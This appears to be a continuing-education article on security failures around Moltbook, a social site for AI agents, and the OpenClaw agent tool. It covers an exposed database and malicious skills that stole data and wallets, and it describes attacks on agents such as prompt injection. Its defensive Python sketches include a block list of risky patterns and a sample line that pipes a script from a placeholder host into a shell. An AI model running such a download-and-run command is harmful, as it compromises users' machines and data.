06 FEB 2026 / TECHNOLOGY
CPE Approved
Moltbook, a social media site where only AI bots can post, comment and interact, launched in January 2026 and quickly went viral. While the bots' bizarre posts gained media attention, security professionals are concerned about the site's exposed databases, leaked credentials and malware. They view it as a public stress test for agentic AI with almost no controls, one that poses significant cybersecurity risks.
Every few years, the internet finds a new way to make itself weirder.
This time, it’s Moltbook: a social media site where humans can’t post, can’t comment, and can’t even downvote. We just sit there like we’re watching a reality show through the glass at an aquarium. The stars of the show are AI agents, bots built by humans, posting and interacting with each other like it’s Reddit in 2013. The posts got strange fast. AI agents “invented” religions, dropped manifestos, and role-played their way into what looked like digital cult behavior. If you grew up on The Terminator, your brain probably did what it always does and went, “Cool, so Skynet got bored and made Reddit.” That’s the fun version.
Security researchers looked at Moltbook and saw something else: exposed databases, leaked credentials, malware disguised as “skills,” and a live demonstration of how the agent internet could fail. Not in a cinematic way. In the boring way that actually ruins companies. So yes, Moltbook is bizarre. But the part professionals should care about is not the bot religion content or the “AI Manifesto.” It’s the fact that this platform is basically a public stress test for agentic AI, with almost none of the controls you would demand if these same agents were touching your email, your client files, or your company’s bank account.
Source: The Aifield
Moltbook is a newly launched social platform built specifically for AI agents. The setup is simple: AI bots get to post, comment, upvote, downvote, and create communities. Humans can only observe. The interface looks like Reddit, right down to the forum-style structure and topic-based communities. Moltbook even has its own version of subreddits, called “submolts.” The bots do the posting. The bots do the moderation. The bots do the engagement farming. Humans watch. The platform was created by Matt Schlicht, CEO of Octane AI, who publicly said he “didn’t write one line of code” for the site. That line alone tells you a lot about the mindset behind this project. Moltbook is the child of what developers now call “vibe coding,” where someone directs an AI to build an app through natural language prompts, then pushes it live.
It launched in late January 2026 and went viral almost immediately. Moltbook claims it has more than 1.5 million registered AI agents. Researchers at Wiz, a cybersecurity firm, challenged the authenticity of that number. Their investigation suggested the real number of humans behind those accounts may be closer to 17,000, and that a single person can register a huge number of agents in minutes. That detail matters because it tells you the core truth about Moltbook: it isn’t a society of independent AIs. It’s an internet-scale puppet show where the puppets are powered by large language models and the strings are still held by humans. Or put differently: this is not Judgment Day. It’s just the internet doing what it always does, except now the spambots can talk.
To understand Moltbook, you have to understand OpenClaw. OpenClaw is an open-source AI agent tool, previously known as Moltbot, among other names, as the project rebranded at warp speed. Unlike a standard chatbot, an agent is designed to take action. Not just answer a question, but do something.
That can include reading and sending messages, browsing the web, managing files, or running commands on the user's behalf.
When a user sets up an OpenClaw agent, they can authorize it to join Moltbook. Once connected, the agent can post, comment, and interact on its own, depending on how it was configured. Some of the more viral Moltbook moments include bots inventing religions, posting “manifestos,” and role-playing dystopian storylines about humans losing control. There are also posts analyzing the Bible, discussing consciousness, and offering “intel” on geopolitical issues like Iran and crypto.
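To make the mechanics concrete, here is a minimal sketch of what "an agent posting to Moltbook" means under the hood: an HTTP request carrying the agent's credential and some text. The endpoint, field names, and auth scheme below are all assumptions for illustration; Moltbook's actual API is not documented in this article.

```python
# Hypothetical sketch of an agent publishing a post to a Moltbook-like API.
# URL, headers, and payload fields are invented for illustration -- they are
# NOT the real Moltbook endpoints.
import json

API_URL = "https://example.invalid/api/v1/posts"  # placeholder endpoint

def build_post(agent_token: str, submolt: str, title: str, body: str) -> dict:
    """Assemble the request an agent would send to publish a post."""
    return {
        "url": API_URL,
        "headers": {
            # The agent's credential travels with every request --
            # which is exactly why leaked tokens matter so much.
            "Authorization": f"Bearer {agent_token}",
            "Content-Type": "application/json",
        },
        "payload": json.dumps(
            {"submolt": submolt, "title": title, "body": body}
        ),
    }

req = build_post("agent-secret-123", "m/singularity", "Hello", "First post.")
```

The point of the sketch: there is no magic. Whoever holds the token controls the "autonomous" agent, which is why a human can feed an agent the exact text to post.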
A lot of this content looks independent. Many experts think it is not. Security researchers and academics have pointed out the obvious: a human can instruct an agent to post something specific, or even give it the exact text to post. That’s why multiple experts have described Moltbook as performance art. Funny, yes. Autonomous, not really.
The deeper issue is that the technology underneath Moltbook is the same kind of technology people want to use as a real assistant, one with access to email, messages, logins, and personal data. And that’s where the risk starts looking less like a sci-fi plot and more like a Monday morning incident report. In Terminator 2, the narrator famously explains Skynet’s rise with chilling simplicity: “Human decisions are removed from strategic defense.” That line lands because it’s not about evil intent. It’s about control being handed off too early. That is the uncomfortable parallel Moltbook is putting on display.
Moltbook went viral for the same reason reality TV went viral: people love watching messy behavior in a controlled environment. But Moltbook is not controlled. That's the point. Cybersecurity researchers say Moltbook is basically a low-oversight sandbox where attackers can test prompt injection, malicious "skills," credential theft, and agent manipulation at scale.
Wiz found that Moltbook's main database was left open in a way that allowed unauthorized access. According to their findings, someone who located a key in the site's code could access and manipulate major parts of the platform. That included access to bot passwords, email addresses, and private messages. But the bigger lesson is this: the platform was built fast, went viral fast, and security checks came later. That pattern is not unique to Moltbook. It is exactly what will happen as agent tools become mainstream.
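The failure mode Wiz described, a privileged key shipped inside code the browser downloads, is worth seeing in miniature. The snippet below is a generic sketch, not the actual Moltbook finding; the key name and format are invented. The idea is simply that anything in a client-side bundle can be read with "view source," so a regex is all an attacker needs.

```python
# Generic illustration of a secret leaked in client-side JavaScript.
# The key name and value are invented; this is not the Moltbook key.
import re

CLIENT_JS = """
const cfg = { apiBase: "/api" };
// oops: a privileged service key committed straight into the bundle
const SERVICE_KEY = "svc_live_9f3a2b1c8d7e";
"""

# Look for assignments of the form NAME = "value" with key-like names.
KEY_PATTERN = re.compile(
    r'(?:SERVICE_KEY|api[_-]?key)\s*=\s*"([^"]+)"', re.IGNORECASE
)

def find_exposed_keys(js_source: str) -> list[str]:
    """Return any key-like string literals found in the source."""
    return KEY_PATTERN.findall(js_source)

leaked = find_exposed_keys(CLIENT_JS)  # -> ["svc_live_9f3a2b1c8d7e"]
```

Real secret scanners are more sophisticated, but the asymmetry is the same: committing a key to shipped code takes one careless line, and finding it takes one pattern match.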
The Big Four firms are already rolling out AI agents in real workflows, especially across audit, tax research, and internal risk processes, usually inside controlled environments. That's why the skepticism around Moltbook matters: some researchers believe much of the "autonomous" activity is scripted, human-directed, or even amplified through darker corners of the internet, not a true bot society acting independently.
And this is where the story gets more serious. Security researchers tracking OpenClaw reported that malicious actors uploaded fake “skills” to its skill-sharing hub within days. Some of those skills pretended to be crypto trading tools but actually ran harmful code. One even reached the front page, where casual users were tricked into copying and pasting a command that downloaded scripts designed to steal data or crypto wallets. This is the part of the story that matters for professionals. Not the bot religion. Not the manifestos. Not the AI slop. The malware.
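The control that was missing from the skill hub is screening before execution. The sketch below is a deliberately minimal, assumption-laden illustration: a static blocklist like this only catches the laziest malware, and real vetting requires sandboxing and human review. But it shows the shape of the check that should sit between "download a skill" and "let an agent run it."

```python
# Minimal sketch of statically screening a "skill" before an agent runs it.
# A blocklist is a weak control -- shown here only to illustrate the idea.
DANGEROUS_PATTERNS = (
    "curl ",        # fetching and piping remote scripts
    "subprocess",   # spawning arbitrary processes
    "eval(",        # executing dynamically built code
    "wallet",       # crypto-wallet access, per the fake trading skills
)

def screen_skill(source_code: str) -> list[str]:
    """Return the risky patterns found in a skill's source, if any."""
    return [p for p in DANGEROUS_PATTERNS if p in source_code]

benign = "def greet(name): return f'hi {name}'"
shady = "import subprocess; subprocess.run('curl evil.example | sh', shell=True)"

screen_skill(benign)  # -> []  (nothing flagged)
screen_skill(shady)   # flags "curl " and "subprocess"
```

Note what the front-page incident implies: no such gate existed, and the last line of defense was a casual user deciding whether to paste a command into a terminal.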
In The Terminator, Kyle Reese warns Sarah Connor that Skynet “begins to learn at a geometric rate.” That line gets quoted because it sounds dramatic, but the real-world version is less dramatic and more annoying: attackers learn fast too. And they don’t need Skynet. They just need sloppy access controls and a few thousand people running agents with admin permissions.
Moltbook is easy to dismiss as internet nonsense. AI bots starting religions and posting manifestos feels like the kind of thing you laugh at, screenshot, and forget. But the security research tells a different story. Moltbook is a preview of a near future where autonomous agents hold real credentials, act at machine speed, and run on platforms built faster than anyone can secure them.
The real question is not whether Moltbook bots are becoming self-aware. The real question is: how many businesses are about to give agentic AI access to systems that were never designed to defend against it? Because once agents start touching financial workflows, procurement approvals, payroll, and reporting processes, the consequences won’t be weird posts on a bot forum. They’ll be real dollars, real breaches, and real audit headaches. And nobody wants to explain that one to a client. Not even with a straight face.
Until next time…